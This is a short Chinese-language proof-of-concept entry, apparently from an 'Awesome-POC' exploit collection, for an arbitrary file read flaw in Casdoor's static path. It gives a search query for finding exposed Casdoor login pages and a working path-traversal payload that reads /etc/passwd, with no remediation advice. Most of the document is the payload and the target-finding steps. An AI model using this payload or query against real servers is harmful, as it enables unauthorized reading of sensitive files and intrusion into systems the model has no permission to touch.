Awesome-POC/Web应用漏洞/Casdoor static 任意文件读取漏洞.md

# Casbin casdoor static 任意文件读取漏洞

## 漏洞描述

Casdoor 是 Casbin 开源社区推出的基于 OAuth 2.0 / OIDC 的中心化的单点登录（SSO）身份验证平台。

Casdoor static 存在任意文件读取漏洞，攻击者通过发送特殊的请求包可以获取服务器中的敏感文件。

## 漏洞影响

```
Casdoor
```

## 网络测绘

```
title="Casdoor"
```

## 漏洞复现

登陆页面

![image-20231115094403952](images/image-20231115094403952.png)

或者

![image-20231115094555640](images/image-20231115094555640.png)

poc

```
/static/../../../../../../../../../../../etc/passwd
```

![image-20231115094237497](images/image-20231115094237497.png)